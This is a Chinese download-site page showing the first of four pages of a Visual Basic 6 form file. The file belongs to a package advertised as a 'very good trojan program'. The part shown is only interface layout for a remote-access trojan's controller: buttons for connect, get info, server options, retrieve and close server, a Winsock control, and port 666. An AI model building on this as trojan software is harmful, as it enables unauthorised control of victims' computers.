⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 frmmain.frm

📁 风暴木马非常好的木马程序
💻 FRM
📖 第 1 页 / 共 4 页
字号:
      Begin VB.Shape shpConnection 
         BorderColor     =   &H00FF8080&
         Height          =   705
         Left            =   0
         Top             =   360
         Visible         =   0   'False
         Width           =   1095
      End
      Begin VB.Label lblGetinfo 
         Alignment       =   2  'Center
         BackColor       =   &H00000000&
         Caption         =   "get info"
         BeginProperty Font 
            Name            =   "Arial"
            Size            =   8.25
            Charset         =   0
            Weight          =   400
            Underline       =   0   'False
            Italic          =   0   'False
            Strikethrough   =   0   'False
         EndProperty
         ForeColor       =   &H00FFFFFF&
         Height          =   225
         Left            =   15
         TabIndex        =   13
         Top             =   380
         Width           =   585
      End
      Begin VB.Label lblServer 
         Alignment       =   2  'Center
         BackColor       =   &H00000000&
         Caption         =   "server options"
         BeginProperty Font 
            Name            =   "Arial"
            Size            =   8.25
            Charset         =   0
            Weight          =   400
            Underline       =   0   'False
            Italic          =   0   'False
            Strikethrough   =   0   'False
         EndProperty
         ForeColor       =   &H00FFFFFF&
         Height          =   225
         Left            =   15
         TabIndex        =   12
         Top             =   600
         Width           =   1065
      End
      Begin VB.Label lblIpnotify 
         Alignment       =   2  'Center
         BackColor       =   &H00000000&
         Caption         =   "ip notify"
         BeginProperty Font 
            Name            =   "Arial"
            Size            =   8.25
            Charset         =   0
            Weight          =   400
            Underline       =   0   'False
            Italic          =   0   'False
            Strikethrough   =   0   'False
         EndProperty
         ForeColor       =   &H00FFFFFF&
         Height          =   225
         Left            =   40
         TabIndex        =   11
         Top             =   840
         Width           =   585
      End
   End
   Begin MSWinsockLib.Winsock WS 
      Left            =   600
      Top             =   4080
      _ExtentX        =   741
      _ExtentY        =   741
   End
   Begin VB.PictureBox picConnect 
      BackColor       =   &H00000000&
      BorderStyle     =   0  'None
      BeginProperty Font 
         Name            =   "MS Sans Serif"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   320
      Left            =   4320
      ScaleHeight     =   315
      ScaleWidth      =   975
      TabIndex        =   8
      Top             =   325
      Width           =   975
      Begin VB.Label lblConnect 
         Alignment       =   2  'Center
         BackColor       =   &H00000000&
         Caption         =   "connect"
         BeginProperty Font 
            Name            =   "Arial"
            Size            =   9
            Charset         =   0
            Weight          =   400
            Underline       =   0   'False
            Italic          =   0   'False
            Strikethrough   =   0   'False
         EndProperty
         ForeColor       =   &H00FFFFFF&
         Height          =   220
         Left            =   40
         TabIndex        =   9
         Top             =   45
         Width           =   880
      End
      Begin VB.Shape Shape1 
         BorderColor     =   &H00FF8080&
         Height          =   290
         Left            =   15
         Top             =   15
         Width           =   945
      End
   End
   Begin VB.TextBox txtPort 
      BackColor       =   &H00000000&
      BorderStyle     =   0  'None
      BeginProperty Font 
         Name            =   "Arial"
         Size            =   9
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      ForeColor       =   &H80000005&
      Height          =   260
      Left            =   3240
      TabIndex        =   5
      Text            =   "666"
      Top             =   350
      Width           =   855
   End
   Begin VB.TextBox txtIp 
      BackColor       =   &H00000000&
      BorderStyle     =   0  'None
      BeginProperty Font 
         Name            =   "Arial"
         Size            =   9
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      ForeColor       =   &H80000005&
      Height          =   260
      Left            =   1200
      TabIndex        =   4
      Text            =   "127.0.0.1"
      Top             =   350
      Width           =   1455
   End
   Begin VB.PictureBox picnotify 
      Appearance      =   0  'Flat
      BackColor       =   &H00000000&
      BeginProperty Font 
         Name            =   "MS Sans Serif"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      ForeColor       =   &H80000008&
      Height          =   4335
      Left            =   1680
      ScaleHeight     =   4305
      ScaleWidth      =   3705
      TabIndex        =   52
      Top             =   840
      Visible         =   0   'False
      Width           =   3735
      Begin VB.Label Label2 
         Alignment       =   2  'Center
         BackColor       =   &H00000000&
         Caption         =   "function not implemented yet!! i'm working on it!!"
         BeginProperty Font 
            Name            =   "Arial"
            Size            =   9
            Charset         =   0
            Weight          =   400
            Underline       =   0   'False
            Italic          =   0   'False
            Strikethrough   =   0   'False
         EndProperty
         ForeColor       =   &H00FFFFFF&
         Height          =   585
         Left            =   480
         TabIndex        =   53
         Top             =   600
         Width           =   2565
      End
   End
   Begin VB.PictureBox picinfo 
      Appearance      =   0  'Flat
      BackColor       =   &H00000000&
      BeginProperty Font 
         Name            =   "MS Sans Serif"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      ForeColor       =   &H80000008&
      Height          =   4335
      Left            =   1680
      ScaleHeight     =   4305
      ScaleWidth      =   3705
      TabIndex        =   48
      Top             =   840
      Visible         =   0   'False
      Width           =   3735
      Begin VB.TextBox txtInfo 
         Appearance      =   0  'Flat
         BackColor       =   &H80000006&
         BorderStyle     =   0  'None
         BeginProperty Font 
            Name            =   "Arial"
            Size            =   9
            Charset         =   0
            Weight          =   400
            Underline       =   0   'False
            Italic          =   0   'False
            Strikethrough   =   0   'False
         EndProperty
         ForeColor       =   &H00FFFFFF&
         Height          =   3255
         Left            =   0
         Locked          =   -1  'True
         MultiLine       =   -1  'True
         TabIndex        =   51
         Text            =   "frmMain.frx":1042
         Top             =   0
         Width           =   3615
      End
      Begin VB.PictureBox Picture12 
         BackColor       =   &H00000000&
         BorderStyle     =   0  'None
         BeginProperty Font 
            Name            =   "MS Sans Serif"
            Size            =   8.25
            Charset         =   0
            Weight          =   400
            Underline       =   0   'False
            Italic          =   0   'False
            Strikethrough   =   0   'False
         EndProperty
         Height          =   315
         Left            =   1440
         ScaleHeight     =   315
         ScaleWidth      =   975
         TabIndex        =   49
         Top             =   3480
         Width           =   975
         Begin VB.Shape Shape7 
            BorderColor     =   &H00FF8080&
            Height          =   290
            Left            =   15
            Top             =   15
            Width           =   945
         End
         Begin VB.Label lblretrieve 
            Alignment       =   2  'Center
            BackColor       =   &H00000000&
            Caption         =   "retrieve"
            BeginProperty Font 
               Name            =   "Arial"
               Size            =   9
               Charset         =   0
               Weight          =   400
               Underline       =   0   'False
               Italic          =   0   'False
               Strikethrough   =   0   'False
            EndProperty
            ForeColor       =   &H00FFFFFF&
            Height          =   220
            Left            =   40
            TabIndex        =   50
            Top             =   45
            Width           =   880
         End
      End
   End
   Begin VB.PictureBox picserver 
      Appearance      =   0  'Flat
      BackColor       =   &H00000000&
      BeginProperty Font 
         Name            =   "MS Sans Serif"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      ForeColor       =   &H80000008&
      Height          =   4335
      Left            =   1680
      ScaleHeight     =   4305
      ScaleWidth      =   3705
      TabIndex        =   45
      Top             =   840
      Visible         =   0   'False
      Width           =   3735
      Begin VB.PictureBox picclose 
         BackColor       =   &H00000000&
         BorderStyle     =   0  'None
         BeginProperty Font 
            Name            =   "MS Sans Serif"
            Size            =   8.25
            Charset         =   0
            Weight          =   400
            Underline       =   0   'False
            Italic          =   0   'False
            Strikethrough   =   0   'False
         EndProperty
         Height          =   315
         Left            =   360
         ScaleHeight     =   315
         ScaleWidth      =   1575
         TabIndex        =   46
         Top             =   600
         Width           =   1575
         Begin VB.Shape Shape8 
            BorderColor     =   &H00FF8080&
            Height          =   285
            Left            =   15
            Top             =   15
            Width           =   1545
         End
         Begin VB.Label lblclose 
            Alignment       =   2  'Center
            BackColor       =   &H00000000&
            Caption         =   "close server"
            BeginProperty Font 
               Name            =   "Arial"
               Size            =   9
               Charset         =   0
               Weight          =   400
               Underline       =   0   'False
               Italic          =   0   'False
               Strikethrough   =   0   'False
            EndProperty
            ForeColor       =   &H00FFFFFF&
            Height          =   225
            Left            =   45
            TabIndex        =   47
            Top             =   45
            Width           =   1485
         End
      End
   End
   Begin VB.PictureBox picmatrix 
      Appearance      =   0  'Flat
      BackColor       =   &H00000000&
      BeginProperty Font 
         Name            =   "MS Sans Serif"
         Size            =   8.25
         Charset         =   0
         Weight          =   400
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      ForeColor       =   &H80000008&
      Height          =   4335
      Left            =   1680
      ScaleHeight     =   4305
      ScaleWidth      =   3705
      TabIndex        =   66
      Top             =   840
      Visible         =   0   'False

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -